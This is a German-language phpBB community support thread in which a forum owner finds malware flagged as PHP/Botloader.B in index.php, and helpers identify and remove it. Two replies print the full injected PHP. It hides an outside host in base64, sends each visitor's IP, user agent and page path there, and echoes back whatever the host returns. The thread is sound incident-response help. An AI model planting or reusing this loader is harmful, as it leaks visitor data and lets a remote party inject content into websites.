phpBB.de

phpBB.de - Die deutsche phpBB-Community
https://www.phpbb.de/community/

Virus in Index.php

https://www.phpbb.de/community/viewtopic.php?t=220111

Seite 1 von 3

Virus in Index.php

Verfasst: 05.01.2012 13:02
von Mille1404
Nachdem ich das Update zu 3.0.10 nun installiert habe wollte ich eine Sicherung der FTP Servers anlegen.

Nun erkennt Antivir direkt einen Virus (Maleware) in der Datei /forum/index.php und benennt ihn mit PHP/Botloader.B

Ist das Problem bekannt? Ich konnte via google leider keinen Hinweis finden. Wie bekomme ich den denn wieder weg?

Da ich nicht der allerbeste bin in PHP frage ich mich, ob ich evtl. eine neue index.php aufspielen kann, oder ob es dann zu Problemen kommt?
Ich weiss ja nicht wie viel das Forum da hineinschreibt oder oben nicht?

Danke schonmal für die nächste Hilfe!
Gruß
Marcel

Re: Virus in Index.php

Verfasst: 05.01.2012 13:11
von Mahony
Hallo
Siehe dazu KB:gehackt

Grüße: Mahony

Re: Virus in Index.php

Verfasst: 05.01.2012 13:12
von Helmut
Hallo Mille1404,

klar kannst du einfach eine neue index.php einspielen wenn die alte Datei nicht durch Mods angepasst wurde. In dem Fall müsstest du die Änderungen halt nochmal rein machen.


Schaue dir doch mal den Code der besagten index.php an, ob da irgendwas nach ?> steht, da darf normal nix kommen. Kannst ja mal die Datei im https://www.phpbb.de/support/pastebin.php einstellen.

Gruß Helmut

Re: Virus in Index.php

Verfasst: 05.01.2012 13:16
von Mille1404
Ja da war mal was hinter dem ?> von einem Googlebot.
Das habe ich schon entfernt.

Ich habe die Datei mal online gestellt in diesem Portal.
Hier ist der Link:

https://www.phpbb.de/support/pastebin.p ... view&s=916

Ich hoffe es ist nur eine kleinigkeit!

Viele Grüße und Danke!

Re: Virus in Index.php

Verfasst: 05.01.2012 13:24
von Helmut
Hallo Mille1404,

der Teil gehört auf alle Fälle nicht zu phpBB dazu und auch nicht in die index.php rein:

Code: Alles auswählen

<?
 
if (!isset($sRetry))
 
{
 
global $sRetry;
 
$sRetry = 1;
 
    // This code use for global bot statistic
 
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
 
    $stCurlHandle = NULL;
 
    $stCurlLink = "";
 
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
 
    {
 
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
 
        $stCurlLink = base64_decode( 'aHR0cDovL2hvdGxvZ3VwZGF0ZS5jb20vc3RhdC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
 
            $stCurlHandle = curl_init( $stCurlLink );
 
    }
 
    }
 
if ( $stCurlHandle !== NULL )
 
{
 
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
 
    $sResult = @curl_exec($stCurlHandle);
 
    if ($sResult[0]=="O")
 
     {$sResult[0]=" ";
 
      echo $sResult; // Statistic code end
 
      }
 
    curl_close($stCurlHandle);
 
}
 
}
 
?>
Hast du was von Google verbaut, sieht etwas nach Googlestatistics .... aus?

Gruß Helmut

Re: Virus in Index.php

Verfasst: 05.01.2012 13:25
von Mahony
Hallo
Dieser Code

Code: Alles auswählen

<?

if (!isset($sRetry))

{

global $sRetry;

$sRetry = 1;

    // This code use for global bot statistic

    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot

    $stCurlHandle = NULL;

    $stCurlLink = "";

    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes

    {

        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics           

        $stCurlLink = base64_decode( 'aHR0cDovL2hvdGxvZ3VwZGF0ZS5jb20vc3RhdC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);

            $stCurlHandle = curl_init( $stCurlLink );

    }

    }

if ( $stCurlHandle !== NULL )

{

    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);

    $sResult = @curl_exec($stCurlHandle);

    if ($sResult[0]=="O")

     {$sResult[0]=" ";

      echo $sResult; // Statistic code end

      }

    curl_close($stCurlHandle);

}

}

?>
stammt von einem Virus bzw. Malware.
Du solltest also gemäß KB:gehackt vorgehen.

P.S. Den Rechner zuerst zu säubern dürfte wohl klar sein.


Grüße: Mahony

Re: Virus in Index.php

Verfasst: 05.01.2012 13:32
von Mille1404
Wunderbar.

Nun klappt wieder alles ohne Probleme und es ist wieder alles Maleware frei..

Zum Thema "Mein Forum wurde gehakt..."
Das Problem war bekannt und behoben.
Dadurch hatte ich ja überhaupt die weiteren Probleme.

Um das ganze wieder hinzubiegen musste ich nun einiges Tun.
Passwörter und co sind alle geändert und auch das andere ist alles erledigt.
Nun ist wieder alles auf einem gescheiten Stand.

Ich denke, dass war nur noch ein überbleibsel, welches Ich übersehen oder vergessen habe.

Vielen vielen Dank nochmals an alle für die Hilfe!

Re: Virus in Index.php

Verfasst: 05.01.2012 15:03
von Tina-
Mille1404 hat geschrieben:Wunderbar.

Nun klappt wieder alles ohne Probleme und es ist wieder alles Maleware frei.. [...]
Hallo,

hast Du denn das Board neu installiert und die Sicherheitslücke gefunden - also wie sie überhaupt reinkamen? (Über eine Erweiterung /Modifikation vielleicht)?
Mille1404 hat geschrieben: [...]
Das Problem war bekannt und behoben.
Dadurch hatte ich ja überhaupt die weiteren Probleme.
Wie meinst Du das?



LG Tina

Re: Virus in Index.php

Verfasst: 05.01.2012 16:09
von hackepeter13
Tina- hat geschrieben:
Mille1404 hat geschrieben:Wunderbar.

Nun klappt wieder alles ohne Probleme und es ist wieder alles Maleware frei.. [...]
Hallo,

hast Du denn das Board neu installiert und die Sicherheitslücke gefunden - also wie sie überhaupt reinkamen? (Über eine Erweiterung /Modifikation vielleicht)?
Es muss nicht durch eine Mod gewesen sein.
Wenn dein PC mit einer bestimmten Malware infiziert ist, kann es passieren, das phpBB3 Dateien auf dem PC nach dem entpacken und vor dem Hoachladen davon mit infiziert werden, übernimmt man die infizierte Datei mit auf den Webspace und das führt dann beim Aufrufen der Seite eben zu einer Virenmeldung.

Deswegen hat Mahony auch geschrieben, das er sein PS vorher säubern sollte.

Re: Virus in Index.php

Verfasst: 05.01.2012 16:23
von Tina-
Es muss nicht durch eine Mod gewesen sein.
Ja, korrekt.... es könnte auch FTP sein.


EDIT:
Tina- hat geschrieben:Wenn Du willst kann Du ja hier mal schauen.
(FTP - gehackt / Hack erfolgte über das Netzwerk des Rechenzentrums)
Alle Zeiten sind UTC+02:00
Seite 1 von 3

Powered by phpBB® Forum Software © phpBB Limited

Deutsche Übersetzung durch phpBB.de